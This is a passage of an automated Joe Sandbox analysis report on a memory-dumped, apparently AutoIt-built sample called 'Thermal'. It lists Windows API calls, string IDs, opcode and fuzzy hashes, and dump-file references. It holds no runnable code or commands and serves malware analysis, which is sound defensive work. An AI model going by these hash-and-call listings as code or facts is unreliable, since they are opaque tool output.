                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: __snwprintf_memmove
                                                • String ID: , $$AUTOITCALLVARIABLE%d
                                                • API String ID: 3506404897-2584243854
                                                • Opcode ID: 6eaf7503c317fc62cb78c246c21211a360c2a8c658c361efafa09ddf57f0d21d
                                                • Instruction ID: ecd9591da8395a0f556311b64aac41132ffc8946e6630b829f767f8eb9b0e93d
                                                • Opcode Fuzzy Hash: 6eaf7503c317fc62cb78c246c21211a360c2a8c658c361efafa09ddf57f0d21d
                                                • Instruction Fuzzy Hash: 3621B131A4021CEBCF14EFA5D895EAE77B9FF58340F404458F914A7281DB38E985DBA2
                                                APIs
                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 007F6D86
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007F6D91
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: Combobox
                                                • API String ID: 3850602802-2096851135
                                                • Opcode ID: 666d2332f1004f89c84e5aefa3234af75da7bdca72d03c1f8bcad91d22d7f66d
                                                • Instruction ID: e6ff3b1315246e0b92db116980a9262c78f2f6f4406ec55d68e1bdb20202f2f1
                                                • Opcode Fuzzy Hash: 666d2332f1004f89c84e5aefa3234af75da7bdca72d03c1f8bcad91d22d7f66d
                                                • Instruction Fuzzy Hash: 1911827131020CBFEF219E54DC81EBB3B6BEB883A4F114525FA189B391D679DC519760
                                                APIs
                                                  • Part of subcall function 00772111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0077214F
                                                  • Part of subcall function 00772111: GetStockObject.GDI32(00000011), ref: 00772163
                                                  • Part of subcall function 00772111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0077216D
                                                • GetWindowRect.USER32(00000000,?), ref: 007F7296
                                                • GetSysColor.USER32(00000012), ref: 007F72B0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                • String ID: static
                                                • API String ID: 1983116058-2160076837
                                                • Opcode ID: 52361ec64f8096e6ef7e0a1f3f945cd40dc9cc0db2ba07c586457e0765b82fa4
                                                • Instruction ID: 3ddddf66b6f3d9a65133422dc22c0263ea005f61a967cc3059e391f4d55e1e87
                                                • Opcode Fuzzy Hash: 52361ec64f8096e6ef7e0a1f3f945cd40dc9cc0db2ba07c586457e0765b82fa4
                                                • Instruction Fuzzy Hash: E621177261420AAFDB04DFA8CC45AFA7BB8FB08314F004519FE55D3251D639E851DB60
                                                APIs
                                                • GetWindowTextLengthW.USER32(00000000), ref: 007F6FC7
                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 007F6FD6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: LengthMessageSendTextWindow
                                                • String ID: edit
                                                • API String ID: 2978978980-2167791130
                                                • Opcode ID: 13f91cfc2676d2bf200b42776b4444a1eb98ec655d40affa7ffddb7421bd853b
                                                • Instruction ID: 76aeb12ed153b4989cc1f442151d0eecfbbffeae2692f1c5dbc632bb1f259eba
                                                • Opcode Fuzzy Hash: 13f91cfc2676d2bf200b42776b4444a1eb98ec655d40affa7ffddb7421bd853b
                                                • Instruction Fuzzy Hash: 55113A7150020CABEB509E64EC84EBB3BAAEB15368F504714FA75972E0C77ADC51AB60
                                                APIs
                                                • _memset.LIBCMT ref: 007D31C9
                                                • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 007D31E8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: InfoItemMenu_memset
                                                • String ID: 0
                                                • API String ID: 2223754486-4108050209
                                                • Opcode ID: 12b50934023289d86ebbce92e318257f916ed7400c858f2cdb6e80d66b66eb96
                                                • Instruction ID: 6a0b15f1357843bf38cf8dde542860631c8f57395c30815e2037dc69118cad17
                                                • Opcode Fuzzy Hash: 12b50934023289d86ebbce92e318257f916ed7400c858f2cdb6e80d66b66eb96
                                                • Instruction Fuzzy Hash: 1D11E27290051EEBDB20DA98DC45B9D77B8BB45310F140123E955E73A0D77AEF09CB92
                                                APIs
                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 007E28F8
                                                • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 007E2921
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Internet$OpenOption
                                                • String ID: <local>
                                                • API String ID: 942729171-4266983199
                                                • Opcode ID: 02d661a6c353212d3c8622c4ef429382ca793b3ef31f7bee278fb8ccb3d47ed3
                                                • Instruction ID: 5e242ca9f9a2ccf7828a8f1e1d960cf50eef5893c1467d119f04d90951f4f4fb
                                                • Opcode Fuzzy Hash: 02d661a6c353212d3c8622c4ef429382ca793b3ef31f7bee278fb8ccb3d47ed3
                                                • Instruction Fuzzy Hash: 07110670502365BAEB248F528C89EF7FB6CFF19350F10412AF54552101E7786892DBF0
                                                APIs
                                                  • Part of subcall function 007E86E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,007E849D,?,00000000,?,?), ref: 007E86F7
                                                • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 007E84A0
                                                • htons.WSOCK32(00000000,?,00000000), ref: 007E84DD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWidehtonsinet_addr
                                                • String ID: 255.255.255.255
                                                • API String ID: 2496851823-2422070025
                                                • Opcode ID: 2803c663cde6bcd1c9064e7a59a11bda3e44c4838c84d92cc5e80a159df47847
                                                • Instruction ID: 673872c5b5522a0c44b8caddcbb20178d7f2ba2264ff100891e9cd42dc66d28e
                                                • Opcode Fuzzy Hash: 2803c663cde6bcd1c9064e7a59a11bda3e44c4838c84d92cc5e80a159df47847
                                                • Instruction Fuzzy Hash: F911C83510125AABDB20EF64DC46FBEB724FF09320F10851BF915972D1DB76A814CB56
                                                APIs
                                                  • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                  • Part of subcall function 007CB79A: GetClassNameW.USER32(?,?,000000FF), ref: 007CB7BD
                                                • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 007C9A2B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ClassMessageNameSend_memmove
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 372448540-1403004172
                                                • Opcode ID: 391401af1b13fd5a7760b6cedb47f010f20de55bb19a729ab716fe581f5253fb
                                                • Instruction ID: d7233d356cae69eec69061a75e5279684a7611997ae6c61d89da29af252bdc5f
                                                • Opcode Fuzzy Hash: 391401af1b13fd5a7760b6cedb47f010f20de55bb19a729ab716fe581f5253fb
                                                • Instruction Fuzzy Hash: B901C471941124AB8B14FBA4CC5ADFE736DAF51310B40060DF871532C1EE3958089760
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: __fread_nolock_memmove
                                                • String ID: EA06
                                                • API String ID: 1988441806-3962188686
                                                • Opcode ID: 68ecda6a0af8871567e61961b4b6e0dd8a2ee251be7f5935e0d5944bdb700dc2
                                                • Instruction ID: 162bceddeca33d03de999cdfc60086f980364920ac3e7cf77db6ba8ff43da2c7
                                                • Opcode Fuzzy Hash: 68ecda6a0af8871567e61961b4b6e0dd8a2ee251be7f5935e0d5944bdb700dc2
                                                • Instruction Fuzzy Hash: AE01F972804268BEDF18C6A8DC5AEFEBBF8DB15301F00419BF552D2281E579E6148760
                                                APIs
                                                  • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                  • Part of subcall function 007CB79A: GetClassNameW.USER32(?,?,000000FF), ref: 007CB7BD
                                                • SendMessageW.USER32(?,00000180,00000000,?), ref: 007C9923
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ClassMessageNameSend_memmove
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 372448540-1403004172
                                                • Opcode ID: 6e57302d381f97efc8b8450eec4db0664f690fd0eadc0b0488422784e00c3682
                                                • Instruction ID: 61dddcfd631e865d81cce134ebc4eb6f96aa39c9ce4055007e42606d57294a85
                                                • Opcode Fuzzy Hash: 6e57302d381f97efc8b8450eec4db0664f690fd0eadc0b0488422784e00c3682
                                                • Instruction Fuzzy Hash: 4801D471A81104ABCB18FBA0D95AFFFB3ACAF51300F50011DB911A3281DE285E0897B2
                                                APIs
                                                  • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                  • Part of subcall function 007CB79A: GetClassNameW.USER32(?,?,000000FF), ref: 007CB7BD
                                                • SendMessageW.USER32(?,00000182,?,00000000), ref: 007C99A6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ClassMessageNameSend_memmove
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 372448540-1403004172
                                                • Opcode ID: 17d88c6bb1221b2fb53f1e8d0e2ff0781d7aae3804727a97fb2743ab0d2446a7
                                                • Instruction ID: 6cc0bcb3c0cd981ecb90640f3652279efbca669d0b47d6a0e0b3f360c4b68e61
                                                • Opcode Fuzzy Hash: 17d88c6bb1221b2fb53f1e8d0e2ff0781d7aae3804727a97fb2743ab0d2446a7
                                                • Instruction Fuzzy Hash: 9A01A772A81114A7CB14FBB4DA1AFFFB3AD9F51340F50011DBD55A3281DE2D5E089672
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ClassName_wcscmp
                                                • String ID: #32770
                                                • API String ID: 2292705959-463685578
                                                • Opcode ID: 2829d67f0709f0432143c263f0e48a52d88063fc225e2b3796121073edd9461c
                                                • Instruction ID: 6cd91caf83d1c2decee56f3c6e0d8354eea74dfdf1c7b6275e35adbfbb63af86
                                                • Opcode Fuzzy Hash: 2829d67f0709f0432143c263f0e48a52d88063fc225e2b3796121073edd9461c
                                                • Instruction Fuzzy Hash: F9E068336003286BD720AB99BC49FABFBACFB44731F000017FC04D7151EA64AA408BE0
                                                APIs
                                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 007C88A0
                                                  • Part of subcall function 00793588: _doexit.LIBCMT ref: 00793592
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Message_doexit
                                                • String ID: AutoIt$Error allocating memory.
                                                • API String ID: 1993061046-4017498283
                                                • Opcode ID: fd027321d32b88d4add0225920c06b8e84295bb1b9383b475c32fbd09c865108
                                                • Instruction ID: bf0e9c7d45b5fc796df0573616147fc6f045f454a005cc301de3f57294e7605d
                                                • Opcode Fuzzy Hash: fd027321d32b88d4add0225920c06b8e84295bb1b9383b475c32fbd09c865108
                                                • Instruction Fuzzy Hash: DBD0123138536872D25432A87C1EFCA7A489B15B51F00442ABB18A55C349DE89D042A5
                                                APIs
                                                  • Part of subcall function 007AB544: _memset.LIBCMT ref: 007AB551
                                                  • Part of subcall function 00790B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,007AB520,?,?,?,0077100A), ref: 00790B79
                                                • IsDebuggerPresent.KERNEL32(?,?,?,0077100A), ref: 007AB524
                                                • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0077100A), ref: 007AB533
                                                Strings
                                                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 007AB52E
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                • API String ID: 3158253471-631824599
                                                • Opcode ID: d6bf13a6476fa4977547d5aa5d87bc459034c74705f825cc7003803e4a8c2ccf
                                                • Instruction ID: 39677c42e90fb0ddc309390bf6c949f67c25f643f4eb54d691cd26ac28823074
                                                • Opcode Fuzzy Hash: d6bf13a6476fa4977547d5aa5d87bc459034c74705f825cc7003803e4a8c2ccf
                                                • Instruction Fuzzy Hash: D9E06DB06003118FD760AF29E809B467AE4BF44304F108A2DE456C6741DBB8D548CB91
                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(?), ref: 007B0091
                                                  • Part of subcall function 007EC6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,007B027A,?), ref: 007EC6E7
                                                  • Part of subcall function 007EC6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 007EC6F9
                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 007B0289
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                • String ID: WIN_XPe
                                                • API String ID: 582185067-3257408948
                                                • Opcode ID: 566b5096925e5a280d1521b75bf0a9136b8baba88354b92426f2a839ec70a27c
                                                • Instruction ID: 22bf7818ab64315aaf982f16ca374a549dee382bd6f7090ee9dbae7e6b01ae82
                                                • Opcode Fuzzy Hash: 566b5096925e5a280d1521b75bf0a9136b8baba88354b92426f2a839ec70a27c
                                                • Instruction Fuzzy Hash: 86F0ED71805109DFCB65EBA5C998BEEBBF8BB48300F644495E146B21A0CB794F84DF61